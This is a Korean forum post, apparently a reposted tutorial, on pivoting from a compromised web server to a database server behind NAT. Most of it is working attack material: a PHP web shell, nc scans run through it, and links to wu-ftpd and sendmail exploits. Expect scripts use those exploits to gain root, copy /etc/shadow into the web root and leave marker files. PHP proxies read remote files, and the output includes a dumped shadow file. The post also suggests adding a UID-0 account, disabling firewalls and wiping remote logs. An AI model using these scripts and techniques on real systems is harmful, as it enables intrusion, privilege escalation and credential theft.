스터디그룹 > LINUX 게시판

웹해킹 - NAT 환경
/*

homepage: http://beist.org
e-mail: beist@hanmail.net
msn: beist@hotmail.com

beist와 관련된 사이트 :
http://wowhacker.com (wowcode at wowhacker team)
http://hackerschool.org (very good hacking portal site)

*/

제목 : NAT 환경에서의 웹 해킹 이야기

안녕하세요?

오늘은 NAT 방식의 네트워크에서, 웹 해킹을 통하여 어떤 방식으로 해킹을
할 수 있는지 알아보겠습니다.

제가 평소에 자주 하는 말이 있는데, 오늘날 웹 해킹은 가장 위험한 기술
이며, WEB 이 뚫리면 나머지의 보안 장치는 무용지물이 되버립니다. 이유는
WEB 은, 사용자에게 보여주고, 이용하게 하는 많은 서비스들이 존재하는데,
이런 서비스 덕분에 WEB 에서는 해당 서버의 다른 데몬이나, 같은 네트워크의
다른 기능들을 하는 서버에 접근할 수 있는 권한이 필요할 수 밖에 없습니다.

예를 들어서, A 라는 WEB 서버와 같은 네트워크에 B 라는 전용 DATABASE 서버가
있습니다. WEB 서버에서 CGI 등에서 자료를 처리해야 할 상황이 올 때 B 서버에
접근을 해야 할 것입니다.

이처럼, A 서버는 같은 네트워크에 존재하는 B 서버에도 자유롭게 들어갈 수
있으며 이 이야기는 즉, 악의적인 목적을 가진 크래커가 A 서버를 해킹하였을
경우, 자유 자재로 B 서버에 접근할 수 있는 권한을 획득하였다는 것을 말합니다.

NAT 방식은, 부족한 IP 문제를 해결하기 위해서 나온 방법이기도 하지만,
NAT 방식이 주로 사용되는 이유는, 회사의 네트워크에서 보안적인 문제를
손쉽게 해결하기 위해서 사용합니다.

NAT 에 대해서 간단히 설명하자면, Network Address Translation 의 약자로,
회사의 각 컴퓨터들은 가상의 IP 를 사용하고, 외부 네트워크로 나가는 IP 나,
사용자가 네트워크로 들어올 때의 IP 는 공인 IP, 즉 지정된 IP 를 사용하는
방식을 말합니다.

예를 들어 회사의 공인 IP 는 다음과 같습니다.

210.aaa.bbb.ccc

사용자는 210.aaa.bbb.ccc 라는 IP 를 통해 회사의 네트워크에 들어올 수 있을
것입니다. 내부 서버들의 가상 IP 들은 다음과 같습니다.

WEB 서버

192.168.0.111

DATABASE 서버

192.168.0.112

AUTH 서버

192.168.0.113

각 서버들이 하는 일은, 서버 이름에서 짐작을 할 수 있습니다. 실제 대형
네트워크 망에서는, DATABASE 서버만도 수십대 이상을 차지하지만 여기서는
이 정도만 설명하여도 충분하므로 똑같이 재현하지는 않겠습니다.

얼핏 보았을 때, WEB 서버나 DATABASE 서버나 모두 Real IP 를 가지고 있지
않고, 가상 IP 로 이루어졌으므로 해킹을 하기가 힘들고, 해킹을 하더라도
나머지 서버까지 연쇄 해킹을 당할 위험이 없을 거라는 생각이 들기도 합니다.

하지만 어차피 모든 서버가 네트워크로 연결되어야만 상호 연산 작용이 가능해지므로
한 서버가 크래커에게 해킹을 당하면, 크래커는, 다른 서버로 패킷을 전송할 수
있는 권한을 얻게 되는 것이므로 연쇄 해킹이 가능해 질 수도 있습니다.

이 문서에서는 크래커가 WEB 서버의 CGI 나 기타 다른 버그를 이용하여 nobody
권한을 획득한 상태라고 가정하고, 그 네트워크 안의 DATABASE 서버까지 해킹하는
방법에 대해서 알아보겠습니다.

다음의 두 상황을 대상으로 강좌를 진행하겠습니다.

1. DATABASE 서버에 Remote 버그가 존재하는 상태.

2. Remote Bug 는 존재하지 않지만 DATABASE 서버에 접속할 수 계정을
알아낸 상태. (즉 DATABASE 서버에 Login 성공이 가능한 상태.)

위의 두 상황을 따로 진행하겠습니다. NAT 방식으로 이루어진 네트워크가 그렇지
않은 네트워크보다 해킹이 어려운 이유는 다음과 같습니다.

NAT 네트워크는 보안 정책이 좀 더 유연해질 수 있습니다. 이유는 패킷이 공인
IP 를 거쳐가는 그 특성 때문에 그 지역에서 보안 정책을 작성하기가 수월하기
때문입니다.

그 보안 정책의 하나를 예를 들어보자면, 사용자가 패킷을 보내와 TCP 연결을
이루는 것은 가능하지만 네트워크에 있는 서버들이 먼저 사용자에게 패킷을 보내서
TCP 연결을 보내는 것을 막는 정책을 세우기가 쉽습니다.

그리고, 또 외부에서 WEB 서버의 Port 인 80 번 Port 를 제외하고 나머지 포트들의
접근을 제한하였다면, 크래커는 Reverse Shell 이나 Term, Port Bind 등을 띄워서
작업을 할 수가 없을 겁니다. (WEB 에서 Shell 을 사용할 수 있게끔 하는 프로젝트가
존재하긴 합니다.)

또, 당연한 이야기지만 NAT 의 각 서버들은 가상 IP 를 쓰기 때문에 외부 네트워크
에서는 이 가상 IP 로 먼저 패킷을 보내어 직접 연결을 맺을 수가 없습니다.

그래서 만약, 크래커가 WEB 서버의 nobody 권한을 획득하였다고 하더라도 같은
네트워크의 다른 서버들까지 접근하기가 NAT 방식을 사용하지 않은 서버에 비해
까다롭다고 할 수 있습니다.

어떤 식으로 극복할 수 있는지 이제부터 알아보도록 하겠습니다. 첫번째 경우입니다.

-- 1. DATABASE 서버에 Remote 버그가 존재하는 상태. --

크래커는 WEB 서버를 해킹하고, nobody 권한으로 어떤 일을 할 수 있도록 다음과
같은 파일을 WEB 서버에 만들어 두었습니다.

beist.php

<? passthru($beist); ?>

크래커는 다음과 같은 형식으로 WEB 서버에서 nobody 권한을 행사할 수 있습니다.

http://WEB서버/beist.php?beist=whoami

[결과]
nobody

DATABASE 서버를 조사하기 위해 nc 를 WEB 서버에 올린 후 WEB 서버에서 DATABASE
서버로 스캔을 시도하겠습니다.

http://WEB서버/beist.php?beist=./nc -v -z 192.168.0.112 1-10000 2> /tmp/result.txt &

결과를 보겠습니다.

http://WEB서버/beist.php?beist=cat /tmp/result.txt

[결과]

beist [127.0.0.1] 3306 (mysql) open
beist [127.0.0.1] 80 (http) open
beist [127.0.0.1] 25 (sendmail) open
beist [127.0.0.1] 23 (telnet) open
beist [127.0.0.1] 22 (ssh) open
beist [127.0.0.1] 21 (ftp) open

여러 개의 포트가 열려있음을 알 수 있습니다. DATABASE 서버의 21 번과 22 번
포트에 취약한 부분이 존재하는지 알아보기 위해 각 데몬의 버전을 확인해보겠습니다.

ftp (21) 버전 알아보기

http://WEB서버/beist.php?beist=./nc -o /tmp/result2.txt 192.168.0.112 21 &

ftp 의 버전을 알아보기 위해 result2.txt 파일을 읽어보겠습니다.

http://WEB서버/beist.php?beist=cat /tmp/result2.txt

[결과]

< 00000000 32 32 30 20 62 65 69 73 74 20 46 54 50 20 73 65 # 220 beist FTP se
< 00000010 72 76 65 72 20 28 56 65 72 73 69 6f 6e 20 77 75 # rver (Version wu
< 00000020 2d 32 2e 36 2e 31 2d 31 38 29 20 72 65 61 64 79 # -2.6.1-18) ready
< 00000030 2e 0d 0a # ...

ftp 의 버전이 wu-2.6.1-18 임을 알 수 있습니다. 같은 방법으로 ssh 의 버전을
알아보겠습니다.

ssh (22) 버전 알아보기

http://WEB서버/beist.php?beist=./nc -o /tmp/result3.txt 192.168.0.112 22 &

result3.txt 읽기.

http://WEB서버/beist.php?beist=cat /tmp/result3.txt

[결과]

< 00000000 53 53 48 2d 31 2e 39 39 2d 4f 70 65 6e 53 53 48 # SSH-1.99-OpenSSH
< 00000010 5f 33 2e 34 70 31 0a # _3.4p1.

ssh 의 버전은 OpenSSH-3.4p1 임을 알 수 있습니다.

두 가지 데몬 중, wu-2.6.1-18 을 대상으로 공격을 시도해보겠습니다. wu-2.6.1-18
ftp 데몬은 Remote Bug 가 알려져 있는 상태입니다.

-- 실전 공격 --

wu-2.6.1-18 을 공격하기 위한 exploit 은 인터넷에 공개되어 있습니다. 여기서는
TESO 팀에서 만든 exploit 을 사용하여 진행하겠습니다. 이 문서를 보고 test 하실
분들을 위해 TESO 팀의 exploit 을

http://beist.org/data1/data/test-wuftp-exp.c

이 곳에 올려놓겠습니다.

이제 본격적으로 실전 공격을 해보겠습니다. 먼저 test-wuftp-exp.c 를 a.c 로
바꿔서 WEB 서버에 올립니다.

여기서는 expect 를 공격에 이용할 것입니다. expect 는 대화형 스크립트 언어로써

http://beist.org/lecture1/read.html?table=beist_linuxlecture&uid=24

이 곳으로 가시면 제가 쓴 expect 강좌를 보실 수 있습니다.

Cracker Computer -> WEB서버 -> DATABASE 서버 순서로 공격을 해야하는데, NAT 방식을
사용하고, Target 네트워크의 보안 정책 때문에 WEB 서버의 80 번 포트 이외로는
접근을 할 수가 없는 상황입니다. Target 네트워크에서 우리 네트워크로 패킷을 먼저
보낼 수도 없는 상황입니다.

그렇기 때문에, 우리는 WEB 서버의 80 번 포트를 이용하여 DATABASE 서버를 공격해야
합니다. 이럴 때 유용한 것이 바로 expect 언어입니다. 우리는 다음과 같은 순서로
공격을 감행할 것입니다.

1. Cracker Computer 에서 WEB 서버의 80 번 포트에 접속
2. wu-ftpd exploit 을 WEB 서버에 Upload
3. 공격 expect 를 WEB 서버에 Upload
4. expect 에서 wu-ftpd exploit 을 컴파일
5. expect 에서 컴파일한 binary 를 이용하여 DATABASE 서버의 wu-FTP 접속
6. wu-ftpd 를 공격하고, DATABASE 서버에서 root 쉘을 얻은 후
7. /etc/shadow 파일을 WEB directory 에 복사하고, /tmp 에 흔적을 남긴다.

expect 에서 해야할 과정은 4 ~ 7 과정입니다.

attack.exp
------------------------------------------------------------
#!/usr/bin/expect

spawn gcc -o a a.c

#컴파일

sleep 2

spawn ./a -a -d 192.168.0.112

# 192.168.0.112 공격

sleep 10

expect -re "uid=0(root)"

# uid=0 문자열을 기다림. (공격 성공을 암시함)

send "cp /etc/shadow /usr/local/apache/htdocs/shadow.txt\n"

# shadow 파일 복사

sleep 1

send "chmod 755 /usr/local/apache/htdocs/shadow.txt\n"

# shadow 파일 퍼미션 조정

sleep 1

send "echo imbeist > /tmp/beist\n"

# /tmp/beist 에 흔적 남김

sleep 1

send "exit\n"

spawn ./nc -o shadow.txt 192.168.0.112 80

# nc 구동하고, 내용을 shadow.txt 로 dump

sleep 2

send "get http://192.168.0.112/shadow.txt HTTP/1.0\r\n\r\n"

# shadow.txt 파일 요청

sleep 2

interact
------------------------------------------------------------

attack.exp 는 expect 언어를 이용하여서 구현해보았습니다. 워낙 내용이
간단하고 단순하여 어떤 구조로 이루어지는지 금방 파악하실 수 있을 겁니다.

위는 간단한 방법이고, 조금 더 좋은 방법을 제안하자면 root 의 패스워드를
임의로 바꾸거나, UID 를 0 인 계정을 추가한 후, FTP 나 SSH 로 로그인 하여
작업을 한다면 더 수월해질수도 있습니다. 이에 대한 응용법은 이 것으로
충분하니까 더 이상 다루지 않겠습니다.

위의 expect 를 실행해봅시다.

http://WEB서버/beist.php?beist=mv teso-wuftp-exp.c a.c
http://WEB서버/beist.php?beist=chmod 755 attack.exp
http://WEB서버/beist.php?beist=./attack.exp &

expect 가 DATABASE 서버를 공격하는 시간이 조금 필요하므로, 1 분 정도의
시간이 흐른 뒤에 다음과 같이 확인을 해보겠습니다.

http://WEB서버/beist.php?beist=cat shadow.txt

[결과]

> 00000000 67 65 74 20 68 74 74 70 3a 2f 2f 62 65 69 73 74 # get http://beist
> 00000010 2e 6f 72 67 2f 73 68 61 64 6f 77 2e 74 78 74 20 # .org/shadow.txt
> 00000020 48 54 54 50 2f 31 2e 30 0a # HTTP/1.0.
> 00000029 0a # .
> 0000002a 0a # .
> 0000002b 0a # .

/* 부분 생략 */

< 000000e0 37 3a 3a 3a 3c 62 72 20 2f 3e 62 69 6e 3a 2a 3a # 7::: bin:*:
< 000000f0 31 31 38 38 37 3a 30 3a 39 39 39 39 39 3a 37 3a # 11887:0:99999:7:
< 00000100 3a 3a 3c 62 72 20 2f 3e 64 61 65 6d 6f 6e 3a 2a # :: daemon:*
< 00000110 3a 31 31 38 38 37 3a 30 3a 39 39 39 39 39 3a 37 # :11887:0:99999:7
< 00000120 3a 3a 3a 3c 62 72 20 2f 3e 61 64 6d 3a 2a 3a 31 # ::: adm:*:1
< 00000130 31 38 38 37 3a 30 3a 39 39 39 39 39 3a 37 3a 3a # 1887:0:99999:7::
< 00000140 3a 3c 62 72 20 2f 3e 6c 70 3a 2a 3a 31 31 38 38 # : lp:*:1188
< 00000150 37 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 3c 62 # 7:0:99999:7:::sync:*:11887
< 00000170 3a 30 3a 39 39 39 39 39 3a 37 3a 3a 3a 3c 62 72 # :0:99999:7:::<br

/* 부분 생략 */

DATABASE 서버의 shadow 파일이 저장되어진 것을 확인할 수 있습니다.

http://WEB서버/beist.php?beist=cat /tmp/beist

[결과]

imbeist

/tmp/beist 파일도 성공적으로 생성된 것을 볼 수 있습니다. expect 를 잘만 활용
한다면, 실제로 Shell 을 얻었을 때의 하는 작업과 거의 같게 할 수 있습니다.

이제 두번째 경우를 대상으로 강좌를 진행하겠습니다.

---- 2. Remote Bug 는 존재하지 않지만 DATABASE 서버에 접속할 수 계정을
알아낸 상태. (즉 DATABASE 서버에 Login 성공이 가능한 상태.) ----

이번에는, DATABASE 서버에 계정은 존재하지만, Remote Bug 가 없어서, WEB 서버에서
DATABASE 서버로 바로 공격할 수 없는 경우일 때로 가정하고 설명하겠습니다.

WEB 서버에서 어떻게 DATABASE 서버의 계정을 알아낼 수가 있는지 그 방법이 궁금하신
분들이 많을 거라 생각됩니다.

네트워크가 큰 회사의 경우, 여러 대의 컴퓨터로 네트워크를 운영하게 됩니다.
WEB 서버에서 DATABASE 서버의 계정을 알아내기 위한 방법으로 다음의 방법들이
있습니다.

먼저 WEB 서버에서의 권한이 nobody 일 경우입니다.

1. WEB 서버에서 DATABASE 서버로 연결하는 CGI 파일 분석
2. WEB 서버의 /etc/passwd, /etc/hosts 등 시스템 관련 정보를 최대한 모아서
DATABASE 서버로 연결할 수 있을만한 것들을 분석
3. WEB 서버의 각종 log 파일을 분석

만약 위의 과정을 거쳤는데도, DATABASE 에서 실질적인 Shell 을 얻을 수 없었다면
WEB 서버의 Root 를 따야할 것입니다. WEB 서버의 Root 를 땄다면 99% 이상은
DATABASE 서버에서 Shell 을 얻을 수 있습니다.

WEB 서버에서 root 권한을 얻었을 때 DATABASE 서버로 갈 수 있는 방법론들.

1. 다른 계정들에서 남긴 history 파일 분석
2. 관리자가 WEB 서버에 접속했을 때 행동 sniffing
3. Network Sniffing 을 통해 계정 패스워드 획득
4. WEB 서버의 shadow 파일을 crack 하여 얻은 계정을 DATABASE 에 대입
5. WEB 서버의 각종 log 파일 분석
6. 기타

이 문서의 요지는 이 방법이 아니니 위에서 설명한 방법들로 DATABASE 로 갈 수
있는 계정을 어떻게든 얻었다고 가정하고 내용을 진행하겠습니다. DATABASE 로
접근할 수 있는 계정의 정보는 다음과 같습니다.

ID : beist
Password : beist.org

이 계정을 가지고, 우리가 DATABASE 서버를 공략하는 방법은 다음과 같습니다.

1. WEB 서버에서 expect 언어를 이용하여 DATABASE 서버로 연결
2. DATABASE 서버의 Local 취약성을 조사
3. Local 취약성 검사를 토대로 Root 권한 획득을 위한 공격을 시도
4. Root 권한 획득 후 흔적을 남김

WEB 서버에서 DATABASE 서버를 nc 로 스캔해보니 다음과 같은 결과가 나왔습니다.

beist [127.0.0.1] 3306 (mysql) open
beist [127.0.0.1] 80 (http) open
beist [127.0.0.1] 25 (sendmail) open
beist [127.0.0.1] 23 (telnet) open
beist [127.0.0.1] 22 (ssh) open
beist [127.0.0.1] 21 (ftp) open

23 번 telnet 을 이용하여서 login 을 시도하겠습니다. 그리고 login 후에 서버의
find / -perm -4000 명령으로 suid 가 걸린 파일들을 찾고, 그 것을 저장시키는
expect 를 알아보겠습니다.

attack2.exp
------------------------------------------------------------
#!/usr/bin/expect

spawn telnet 192.168.0.112

expect -re "login:"

send "beist\n"

expect -re "assw"

send "beist.org\n"

expect -re "Last login"

send "find / -perm -4000 > /usr/local/apache/htdocs/perm.txt &\n"

sleep 1

send "exit\n"

interact
------------------------------------------------------------

http://WEB서버/beist.php?beist=./attack2.exp

attack2.exp 가 정상적으로 진행되었다면, DATABASE 의
/usr/local/apache/htdocs/perm.txt 파일에는 DATABASE 서버 내의 suid 파일
리스트가 저장될 것입니다. 다음 파일을 WEB 서버에 올려보겠습니다.

read.php
------------------------------------------------------------
<?

if(!$file)
{
echo "file 변수를 입력해 주세요.";
exit;
}

$fd = fopen("http://192.168.0.112/".$file, "r");

while ($buffer = fgets($fd, 4096)) {
echo $buffer;
}

fclose($fd);

?>
------------------------------------------------------------

이 파일을 WEB 서버에 올려놓았으면 다음과 같은 형식으로 DATABASE 서버의 웹
파일들을 볼 수 있습니다.

http://WEB서버/read.php?file=perm.txt

[결과]

/usr/bin/suidperl
/usr/bin/sperl5.6.0
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/crontab
/usr/bin/rcp
/usr/bin/rlogin
/usr/bin/rsh
/usr/bin/sudo
/usr/sbin/ping6
/usr/sbin/traceroute6
/usr/sbin/sendmail

/* 생략 */

DATABASE 서버의 웹 디렉토리에 놓인 파일만 보려는 것이 아니라 다른 파일들도
편하게 보려면, DATABASE 서버의 웹 디렉토리에 다음과 같은 파일을 만들어둡니다.

read2.php
------------------------------------------------------------
<?

if(!$file)
{
echo "file 변수를 입력해 주세요.";
exit;
}

$fd = fopen("$file", "r");

while ($buffer = fgets($fd, 4096)) {
echo $buffer;
}

fclose($fd);

?>
------------------------------------------------------------

그리고 WEB 서버에 놓인 read.php 에서

$fd = fopen("http://192.168.0.112/".$file, "r");

문장을

$fd = fopen("http://192.168.0.112/read2.php?file=".$file, "r");

로 고쳐주고

http://WEB서버/read.php?file=/etc/passwd

를 한다면, DATABASE 서버 내의 /etc/passwd 파일을 볼 수 있을 것입니다. 이런
식으로 조금만 변형하면 DATABASE 서버로 바로 Nobody 명령을 내릴 수도 있습니다.

이 문서는 이게 중점이 되는 내용이 아니니 이런식으로 작업을 진행할 수 있다는
것만 알아둡시다. 어쨌거나 perm.txt 파일을 보면 DATABASE 서버 내에 어떤 suid 가
존재하는지 알 수 있습니다.

우리는 sendmail 을 target 으로 삼아 공격을 시도해보겠습니다. -1- 에서
데몬의 버전을 알아본 방법으로 DATABASE 서버의 sendmail 의 버전을 알아본 결과
8.11.5 였습니다. 8.11.5 버전에는 크래커에게 root 를 줄 수 있는 취약성이 공개된
상태입니다.

sendmail 을 공격하는 exploit 으로 sd@sf.cz 가 만든 exploit 을 이용해보겠습니다.
테스트 해보실 분들을 위해 http://beist.org/data1/data/sendmail-exp.c 에 exploit
을 올려놓겠습니다.

sendmail-exp.c 파일을 DATABASE 서버에 a.c 라는 파일로 만들어둡니다. 그리고
WEB 서버에 attack3.exp 파일을 올립니다.

attack3.exp
------------------------------------------------------------
#!/usr/bin/expect

spawn telnet 192.168.0.112

expect -re "login:"

send "beist\n"

# id 입력

expect -re "assw"

send "beist.org\n"

# password 입력

expect -re "Last login"

send "gcc -o a a.c\n"

# login 후에 컴파일

expect -re "entering rootshell"

send "cp /etc/shadow /usr/local/apache/htdocs/shadow.txt\n"

send "chmod 755 /usr/local/apache/htdocs/shadow.txt\n"

send "echo imbeist > /tmp/beist\n"

# 여러가지 흔적 남기기 작업들

sleep 1

send "exit\n"

interact
------------------------------------------------------------

그리고 다음과 같이 실행합니다.

http://WEB서버/beist.php?beist=./attack3.exp

attack3.exp 이 정상적으로 DATABASE 서버에 접속하고, exploit 이 성공하여
root 를 획득하였다면 /etc/shadow 파일을 웹 디렉토리에 카피하고,
/tmp/beist 에 imbeist 라는 파일 내용을 만들어 둘 것입니다. 실제로
만들어졌는지 확인하여보겠습니다.

http://WEB서버/read.php?file=shadow.txt

[결과]

root:$1$DZfS/9N.$gq0dfkxckvnmfXqHsI/:11887:0:99999:7:::
bin:*:11887:0:99999:7:::
daemon:*:11887:0:99999:7:::
adm:*:11887:0:99999:7:::
lp:*:11887:0:99999:7:::
sync:*:11887:0:99999:7:::
shutdown:*:11887:0:99999:7:::
halt:*:11887:0:99999:7:::
mail:*:11887:0:99999:7:::
news:*:11887:0:99999:7:::
uucp:*:11887:0:99999:7:::
operator:*:11887:0:99999:7:::

/* 생략 */

shadow.txt 파일이 성공적으로 생성된 것을 알 수 있습니다. 우리는 이런 식으로
NAT 방식에서 해킹을 성공할 수 있었습니다. 만약 가능하다면 방화벽을 해제하고 term
등을 띄우는 것이 좋을 것입니다.

- 마치면서 -

아무리 명령어를 내리기 힘들고 열악한 Shell 환경이라 할지라도, 단 한 명령어만
실행이 가능하다면 어떻게든 해킹을 하는 것이 가능하다는 것을 위의 상황에서
볼 수 있었습니다.

물론 위 상황은 조금만 변경한다면 NAT 가 아닌 네트워크의 환경에서도 적용되는
기술입니다. 'NAT 방식은 가상 IP 체계로 돌아가므로 해킹에 안전하다.' 라는
것은 잘못된 생각이라는 것을 알 수 있습니다.

이런 방식으로 서버의 서버를 거쳐서 들어가는 해킹을 해커들끼리는 흔히
'타고 들어간다.' 라는 은어로 표현합니다. 저의 옛날 경험을 말씀드리자면
3 개의 서버를 타고 들어가야 하는 상황이 있었습니다. 물론 불법은 아니었고요.
그 네트워크도 NAT 방식이었는데, NAT 에 또 사설 네트워크를 구축하여 사용하는
곳이라, 또 타고 들어갈 수 밖에 없었습니다.

위 방법은 직접적으로 Term 등을 띄워서 하는 작업보다 불편한 것은 사실이지만,
Term 을 못 띄우더라도, Term 에서 하는 거의 모든 일이 가능합니다. 또, 물론
이 것은 해킹만이 아니라 원격 서버에 있는 로그를 지우거나 할 때나 기타 다른
작업을 할 때나 모든 부분에 응용할 수 있을 것입니다.

NAT 네트워크 환경에서의 해킹 방법에 대해서 알아보았습니다.